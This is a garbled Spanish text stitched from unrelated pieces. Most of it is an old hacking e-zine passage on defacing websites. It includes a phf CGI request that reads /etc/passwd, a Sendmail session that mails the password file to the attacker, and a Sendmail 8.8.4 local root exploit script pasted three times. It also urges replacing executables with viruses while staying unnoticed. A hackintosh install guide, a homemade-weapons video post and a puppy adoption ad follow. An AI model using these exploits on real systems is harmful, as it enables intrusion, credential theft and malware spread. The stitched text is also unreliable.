bien. Son novatos. Mucho mejor, seguro que tendránun huevo de fallos. ¿Tendrán ftp anonimo?Login: anonymouspassworD: anonymousyeah! hay ftp anónimo con programitas shareware jeje....mmmm... no está el directorio etc/ ....vamos a ver si deja cambiar de directorio. igual está oculto.-chg directorycambiar a /etcno existe. igual lo tienen protegido.cambiar a /administradorno existe.cambiar a /administratorSI EXISTE... heheheque hay en este directorio... etc/ bin/ mail/ (joder!) etc.....joder! si están las páginas web aqui!y el correo electrónico y todo! ah!. Soy un hacker no un criminal.A pesar de poder abrirse cuenta de acceso a internet, leer correos electrónicosetc... solo cambió la página web.el servidor en cuestión es conexión global internet (http://www.cglobal.com)aunque el nombre cambió durante un día por "conexión mamadón internet"hehehe... ya no tienen ftp anonimo. (mira a ver). es que los hay capullos.Por probar que no quede. A probar todo lo que se te ocurra.Si el servidor es de WinNT mejor que mejor! más rápido caerá.probar con directorios ocultos tipo:/root/pub/bin/etc/administrador/administrator/lo que se te ocurra.Hay otros métodos, los más eficaces (y más complicados) por Telnel, pero lo dejaré para números siguientes.Ok ?bye!BlackJack 97Light Cracking Distributionhttp://www.redestb.es/personal/lcdÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»º º +++ Azum Lord +++ ºº HACKEANDO WEB'S º ºº º http://members.tripod.com/~jleg/logos/wlm.html ºº º AzumLord@bigfoot.com ºº º ºÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼCONTENIDOS1.- Disclaimer2.- Introduccion3.- Comenzando el ataque4.- Obtencion del fichero de Passwd5.- Usando Exploits6.- Y recuerda....@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%DISCLAIMER @%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%El contenido de este texto esta solamente destinado a usos educacionales,de investigacion y de desarrollo. En ningun momento el creador de este texto se hace responsable de los da¤os causados debido a un mal uso de elmismo.@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%INTRODUCCION @%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%Si alguna vez se te ha ocurrido que seria divertido cambiar algunas cuantas cosillas de alguna web o de adue¤arte de alguna, este texto espara ti.Si tu enemigo tiene una web y quieres acabar con ella este texto es para ti.O si simplemente quieres conocer las posibilidades del hacking este textoes para ti.@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%COMENZANDO EL ATAQUE @%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%Lo primero que hay hacer es localizar al servidor victima...(e.j.)http://www.victima.com <----------- VictimaDespues recopila la mayor cantidad de informacion sobre el servidor victima por ejemplo su IP, DNS, version de Sendmail, etc.La mayoria de las veces el servidor que contiene la web-page del site solo tiene unos cuantos logins como el del root y el de algunos cuantos administradores pero para saber cuales y cuantos usuarios, necesitasel fichero de passwd.@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%OBTENCION DEL FICHERO DE PASSWD@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%Hay varias formas de entrar, una de ellas seria obteniendo el archivo de passwd pero como? bueno he aqui algunas formas.Nota para Newbies: Si entras al servidor por ftp con el usuario anonymous y te vas al directorio /etc y te encuentras el fichero passwd note emociones este fichero solo es basura el fichero correcto esta en:/home/ftp/etc/passwd <--------- Basura que encuentras si entras por anonymous/etc/passwd <------------------ Fichero correcto de passwd.Hay muchas formas de obtener el fichero de passwd como por ejemplo con el phf:http://www.elsitevictima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd( 1 )( 2 )( 3 )( 4 )(5)( 6 )1.- El site que quieras atacar.2.- El comando phf.3.- Aqui es donde esta el secreto.4.- El programa que quieres que se ejecute.5.- El %20 es un espacio.6.- Y pues aqui va el archivo o directorio que quieres ver.O tambien con exploits, este es para obtener el fichero de passwd deservidores con Sendmail con versiones anteriores a la 5.57% telnet victima.com 25 Trying 255.255.255.0...Connected to victima.com Escape character is '^]'.220 victima.com Sendmail 5.55 ready at Sunday, 12 Sept 97 12:09mail from: "|/bin/mail tudireccion@decorreo.com < /etc/passwd250 "|/bin/mail tudireccion@decorreo.com < /etc/passwd"... Sender okrcpt to: Aqui_pon_lo_que_se_te_antoje.550 Aqui_pon_lo_que_se_te_antoje.... User unknowndata354 Enter mail, end with "." on a line by itself.250 Mail acceptedquitConnection closed by foreign host.%Despues crackeas el fichero de passwd con cualquier crackeador como el Jack the Ripper o el que acostumbres usar y si sacas alguna de las cuentas telnetea:%telnet%o(to)www.victima.comTrying 255.255.255.0 ....Escape character is '^]'.Linux 2.0.0 (www.victima.com) (tty2)login:XXXXXXXXpasswd:XXXXXXXX@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%USANDO EXPLOITS@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%La forma mas sencilla de hackear una web-page es usando exploits he aqui unoque te hara root en Sendmail 8.8.4.--------------------------------- CORTA AQUI ---------------------------------cat << _EOF_ >/tmp/x.c#define RUN "/bin/ksh"#include<stdio.h>main(){execl(RUN,RUN,NULL);}_EOF_#cat << _EOF_ >/tmp/spawnfish.cmain(){execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_#cat << _EOF_ >/tmp/smtpd.cmain(){setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x";}_EOF_##gcc -O -o /tmp/x /tmp/x.cgcc -O3 -o /tmp/spawnfish /tmp/spawnfish.cgcc -O3 -o /tmp/smtpd /tmp/smtpd.c#/tmp/spawnfishkill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.csleep 5if [ -u /tmp/x ] ; thenecho "leet..."/tmp/xfi cat << _EOF_ >/tmp/x.c#define RUN "/bin/ksh"#include<stdio.h>main(){execl(RUN,RUN,NULL);}_EOF_#cat << _EOF_ >/tmp/spawnfish.cmain(){execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_>#cat << _EOF_ >/tmp/smtpd.cmain(){setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x";}_EOF_##gcc -O -o /tmp/x /tmp/x.cgcc -O3 -o /tmp/spawnfish /tmp/spawnfish.cgcc -O3 -o /tmp/smtpd /tmp/smtpd.c#/tmp/spawnfishkill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.csleep 5if [ -u /tmp/x ] ; thenecho "leet..."/tmp/xfi cat << _EOF_ >/tmp/x.c#define RUN "/bin/ksh"#include<stdio.h>main(){execl(RUN,RUN,NULL);}_EOF_#cat << _EOF_ >/tmp/spawnfish.cmain(){execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_#cat << _EOF_ >/tmp/smtpd.cmain(){setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x";}_EOF_##gcc -O -o /tmp/x /tmp/x.cgcc -O3 -o /tmp/spawnfish /tmp/spawnfish.cgcc -O3 -o /tmp/smtpd /tmp/smtpd.c#/tmp/spawnfishkill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.csleep 5if [ -u /tmp/x ] ; thenecho "leet..."/tmp/xfi --------------------------------- CORTA AQUI ---------------------------------Hay infinidad de exploits como este en la red si deseas links a paginasque continen cientos revisa la seccion de links de la revista Raregazz.@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%Y RECUERDA ...@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%Bien ya tengo el root o una cuenta de algun administrador ahora que?, puesahora sigue la parte mas divertida.Estando como root bajas todos los archivos de la pagina y despues los editas cada archivo guardalo con el mismo nombre que tenia para ahorrartetrabajo, luego editas la web-page.Usa tu imaginzacion por ejemplo si hay archivos executables remplazalos por virus cambia los links modifica las imagenes etc. ahorareemplazas los antiguos archivos por los nuevos recuerda que el chiste eshacer cambios que no llamen mucho la atencion para que los Admins no se dencuenta y dure mas tiempo.
Instala Mac OS X Lion en cualquier PC con UniBeast: La guía completa A lo largo de mi vida de usuario informático me han hablado de muchas formas de instalar o ejecutar Mac OS en un PC, pero siempre me han dado una pereza terrible, y la verdad es que aunque tenga su gracia el tema y probar esté muy bien nunca me he lanzado, así como si lo he hecho con infinidad de distribuciones Linux que te ponen más fácil las cosas. Pero ahora gracias a UniBeast las cosas nos las han puesto muy fáciles, y cumpliendo unos pocos requisitos (muy lógicos) podremos crear un USB bootable con Mac OS X Lion para instalarlo en cualquier PC. Lo primero necesitaremos dos cosas, ambas imprescindibles. Un Mac con Mac OS X Lion instalado y una memoria USB de 8GB de capacidad. El primero será el que cree el USB bootable a partir del segundo. Nada más, esto es todo lo que necesitas. Bueno, evidentemente también tendrás que descargar UniBeast, que es la aplicación que nos facilita toda la tarea. Y vamos con el proceso, que aunque sencillo hay que seguir al detalle para no perdernos nada: Insertamos la memoria USB y abrimos Disk Utility bajo Aplicaciones/Utilidades.Con el USB seleccionado en la columna de la izquierda pulsamos sobre la pestaña Particiones y seleccionamos 1 Partición.Ahora le damos a Opciones y seleccionamos Master Boot Record.En Nombre ponemos USB, en Formato Mac OS Extended (Journaled) y le damos a Aplicar y comenzamos el proceso.Ejecutamos UniBeast, y le damos a Continue tres veces y por último Agree.Cuando llegamos al paso de Destination Select tenemos que elegir USB y darle a Continuar.En Installation Type tenemos tres opciones que podemos elegir si queremos. Pulsamos Continue una vez más y por último Install tras introducir la contraseña de nuestro Mac OS X Lion.A continuación ya podemos introducir el USB con nuestro PC apagado y arrancar desde el USB bootable que hemos creado. Pero antes tendremos que configurar la BIOS para que el primer boot device sea el USB-HDD. Lo normal para esto es pulsando F12 durante el arranque del PC, pero depende de la BIOS. Ahora ya si que podemos arrancar el PC con el USB conectado y nos aparecerá una ventana de carga. Es posible que nos pida algunos datos extra que escribir, que dependiendo del caso son los siguientes: AMD Radeon 6670: PCIRootUID=0Unsupported graphics: GraphicsEnabler=NoBoot in Single-user mode: -sBoot in Verbose mode: -vBoot in Safe mode: -xAhora tendremos que elegir el idioma y si estamos actualizando una instalación de Sonw Leopard tendremos que saltarnos los siguientes pasos: Seleccionar Utilities en el menu de arriba y abrir Disk Utility.Seleccionamos el disco duro de destino para la instalación de Lion.Seleccionamos la pestaña Partition, Current, y seleccionamos 1 Partition.Le damos a Options, seleccionamos GUID Partition Method y en Name ponemos Lion, en Format seleccionamos Mac OS Extended (Journaled) y le damos a Apply y a Partition.Cerramos Disk Utility.Ahora ya seguimos con el proceso. Cuando nos pregunten dónde instalar seleccionamos Lion y cuando termine el proceso reiniciamos el sistema. Por último podemos bajar MultiBeast, una herramienta del mismo desarrollador que nos facilita instalar un montón de drivers para tarjetas de audio, vídeo y red y que todo funcione perfectamente. Lo puedes hacer aquí. Espero que te haya gustado esta guía y que todo te salga bien. De todas formas aquí tienes la original del desarrollador por si tienes alguna duda.
bueno hoy les traego como hacer unas armas caseras espero y difruten lo videos el primer video es como hacer un dardo el q sigue es como hacer un mini lanza patatas ahora como hacer pinza pistola ahora como hacer un file casero y ahora les dejo uno q no es una arma casera pero me gusto aun asi por ultimo les dejare unas imagenes dde algunas armas caseras NO INTENTEN ESTO EN CASA
Estas cachorritas fueron encontradas en la carretera en Algeciras (Cadiz), se haran tamaño mediano en un futuro (unos 15 kilos aprox.) No sabemos con que pueden estar cruzadas. Son muy cariñosas y juguetonas. Se envian a cualquier provincia con su chip y vacuna. Contacto: elduroenlata@hotmail.es (Poned en el Asunto el nombre de la perrita que interese)